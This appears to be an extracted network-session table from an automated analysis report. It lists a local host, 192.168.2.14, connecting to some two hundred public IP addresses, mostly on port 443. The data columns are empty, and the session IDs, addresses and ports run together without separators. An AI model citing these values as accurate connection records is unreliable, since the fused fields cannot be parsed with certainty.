                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20880192.168.2.145453464.36.65.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20881192.168.2.1439472141.213.27.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20882192.168.2.1456218126.197.34.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20883192.168.2.1438864136.74.20.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20884192.168.2.1460638205.62.144.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20885192.168.2.1452980185.231.249.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20886192.168.2.1443352189.93.42.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20887192.168.2.144902894.112.154.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20888192.168.2.1449004201.30.124.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20889192.168.2.1458896146.2.17.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20890192.168.2.144937080.149.172.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20891192.168.2.143408666.234.203.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20892192.168.2.145491086.22.36.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20893192.168.2.144717675.40.203.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20894192.168.2.1435150121.8.108.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20895192.168.2.145677488.184.35.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20896192.168.2.143603860.194.154.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20897192.168.2.1444606177.158.45.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20898192.168.2.144220886.126.22.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20899192.168.2.146078044.155.152.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20900192.168.2.1432862198.222.145.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20901192.168.2.1451604100.176.205.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20902192.168.2.1433800167.244.209.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20903192.168.2.1451594150.70.126.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20904192.168.2.1440508132.183.1.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20905192.168.2.1433532212.133.76.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20906192.168.2.1445460179.52.185.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20907192.168.2.145540075.129.64.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20908192.168.2.14496302.99.189.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20909192.168.2.1456408198.178.154.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20910192.168.2.1459708201.118.156.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20911192.168.2.1458242131.15.139.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20912192.168.2.1448242100.23.35.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20913192.168.2.1458224184.212.23.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20914192.168.2.145193244.79.79.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20915192.168.2.1449838202.247.233.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20916192.168.2.1439720109.1.223.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20917192.168.2.1443772216.57.25.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20918192.168.2.1433492196.147.67.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20919192.168.2.1446076180.131.14.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20920192.168.2.1454176158.205.109.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20921192.168.2.143484496.149.249.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20922192.168.2.143475639.85.126.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20923192.168.2.1459746145.74.148.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20924192.168.2.1436282172.123.153.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20925192.168.2.1455626184.82.126.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20926192.168.2.144894859.174.77.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20927192.168.2.1459446180.97.246.898080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20928192.168.2.1450624157.7.133.2428080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20929192.168.2.1435186183.109.85.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20930192.168.2.1451518207.12.85.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20931192.168.2.1455290172.105.68.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20932192.168.2.1445482113.255.69.227443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20933192.168.2.1446750220.69.179.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20934192.168.2.144926245.138.218.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20935192.168.2.1459592130.35.109.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20936192.168.2.1444738153.122.54.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20937192.168.2.145190024.93.117.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20938192.168.2.145627068.65.230.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20939192.168.2.144757459.35.81.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20940192.168.2.1455116195.232.186.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20941192.168.2.144016688.37.147.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20942192.168.2.1457656178.37.187.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20943192.168.2.145703292.220.247.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20944192.168.2.1435626122.180.195.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20945192.168.2.144554875.252.238.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20946192.168.2.1460804131.60.33.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20947192.168.2.143878246.125.243.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20948192.168.2.1451872124.126.145.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20949192.168.2.1455296169.206.106.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20950192.168.2.1451318146.145.137.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20951192.168.2.1444504139.148.158.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20952192.168.2.145062892.155.15.215443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20953192.168.2.143349064.212.163.241443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20954192.168.2.1443594176.40.164.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20955192.168.2.144462685.174.64.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20956192.168.2.1433806194.122.125.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20957192.168.2.1457486213.136.139.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20958192.168.2.144847225.107.221.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20959192.168.2.1452052171.217.3.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20960192.168.2.1450550157.117.196.226443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20961192.168.2.1445354121.41.118.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20962192.168.2.1448080199.172.247.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20963192.168.2.145427480.204.201.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20964192.168.2.145204889.246.27.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20965192.168.2.1433980129.142.189.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20966192.168.2.1455718111.41.201.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20967192.168.2.145367838.131.188.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20968192.168.2.1441686131.78.204.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20969192.168.2.1454650118.30.12.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20970192.168.2.1458886188.10.163.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20971192.168.2.1450354173.106.74.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20972192.168.2.1459494112.174.179.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20973192.168.2.1455882190.200.73.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20974192.168.2.143704086.211.235.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20975192.168.2.145518614.111.168.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20976192.168.2.144854695.105.37.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20977192.168.2.1435416130.196.210.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20978192.168.2.1443988182.60.225.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20979192.168.2.1448836166.180.228.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20980192.168.2.1438352204.78.57.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20981192.168.2.1458434185.112.228.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20982192.168.2.145856850.177.164.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20983192.168.2.1454046212.189.1.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20984192.168.2.1440316137.183.195.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20985192.168.2.1441368122.175.64.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20986192.168.2.1437908126.19.152.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20987192.168.2.1434478115.59.35.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20988192.168.2.145430640.130.35.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20989192.168.2.1438624221.30.168.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20990192.168.2.1438684121.16.35.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20991192.168.2.1458528149.239.139.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20992192.168.2.145903636.52.165.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20993192.168.2.1447402171.13.209.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20994192.168.2.145948272.50.108.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20995192.168.2.144851662.111.56.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20996192.168.2.144437466.165.1.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20997192.168.2.14593649.101.196.46443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20998192.168.2.1438334223.152.111.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20999192.168.2.14521345.9.9.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21000192.168.2.1441122157.151.17.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21001192.168.2.144024284.212.252.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21002192.168.2.1442000163.141.128.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21003192.168.2.145123460.24.254.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21004192.168.2.1439212164.8.166.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21005192.168.2.1457956216.83.125.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21006192.168.2.1448384185.123.221.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21007192.168.2.1449794203.108.114.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21008192.168.2.1436726120.21.56.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21009192.168.2.144254870.142.113.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21010192.168.2.1450812128.188.177.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21011192.168.2.144794043.95.30.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21012192.168.2.145676034.75.243.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21013192.168.2.1439012156.170.160.204443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21014192.168.2.1452182111.230.120.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21015192.168.2.1441478133.61.130.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21016192.168.2.1433210139.84.112.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21017192.168.2.1441888177.109.138.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21018192.168.2.145323682.33.103.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21019192.168.2.144525643.89.81.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21020192.168.2.1433500115.78.4.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21021192.168.2.1443642122.105.21.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21022192.168.2.1448644216.125.248.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21023192.168.2.14536329.185.102.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21024192.168.2.144772643.89.137.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21025192.168.2.14563848.6.214.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21026192.168.2.1456048161.94.165.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21027192.168.2.143647066.66.143.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21028192.168.2.144046212.94.84.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21029192.168.2.1453082185.172.108.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21030192.168.2.144040461.60.155.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21031192.168.2.144498068.189.89.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21032192.168.2.1453258134.133.86.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21033192.168.2.1452744133.156.79.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21034192.168.2.1455694169.250.253.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21035192.168.2.1436034119.201.210.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21036192.168.2.1459374196.19.150.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21037192.168.2.1436540173.125.94.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21038192.168.2.143773674.202.233.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21039192.168.2.1443910206.86.32.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21040192.168.2.144104447.24.15.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21041192.168.2.1452624114.44.82.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21042192.168.2.143680418.94.26.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21043192.168.2.1451584125.1.140.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21044192.168.2.1439288132.38.183.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21045192.168.2.1445694133.34.168.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21046192.168.2.1449010131.129.224.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21047192.168.2.145267876.145.39.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21048192.168.2.1441490150.162.246.55443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21049192.168.2.1433412153.108.237.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21050192.168.2.145203460.125.21.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21051192.168.2.1452040153.176.22.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21052192.168.2.145021660.42.188.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21053192.168.2.1441966175.72.23.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21054192.168.2.1436266198.222.182.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21055192.168.2.1454510190.115.84.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21056192.168.2.1435574122.101.96.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21057192.168.2.1457116103.135.209.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21058192.168.2.1452368160.72.200.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21059192.168.2.145123072.245.226.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21060192.168.2.1453858119.229.64.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21061192.168.2.144264025.202.10.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21062192.168.2.144262488.109.39.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21063192.168.2.1444778138.240.186.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21064192.168.2.144791239.40.74.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21065192.168.2.1435510120.239.133.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21066192.168.2.1445452174.157.31.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21067192.168.2.145898836.219.60.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21068192.168.2.1451168148.103.114.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21069192.168.2.143653235.15.21.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21070192.168.2.144553457.60.228.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21071192.168.2.143500060.49.189.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21072192.168.2.1442818164.28.31.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21073192.168.2.1452916159.159.36.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21074192.168.2.144063281.241.132.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21075192.168.2.1456034149.226.83.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21076192.168.2.145859447.10.33.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21077192.168.2.1453686201.180.134.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21078192.168.2.1459832187.254.41.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21079192.168.2.1440320139.71.91.70443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21080192.168.2.1446508148.211.208.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21081192.168.2.145196693.49.167.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21082192.168.2.1438272133.199.168.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21083192.168.2.1440036138.141.47.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21084192.168.2.144616059.32.94.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21085192.168.2.145099457.121.92.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21086192.168.2.144917239.231.0.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21087192.168.2.1437042184.253.161.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21088192.168.2.1440494177.37.59.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21089192.168.2.143855466.169.178.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21090192.168.2.1436530139.70.40.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21091192.168.2.1458198173.118.129.176443
                                                      TimestampBytes transferredDirectionData


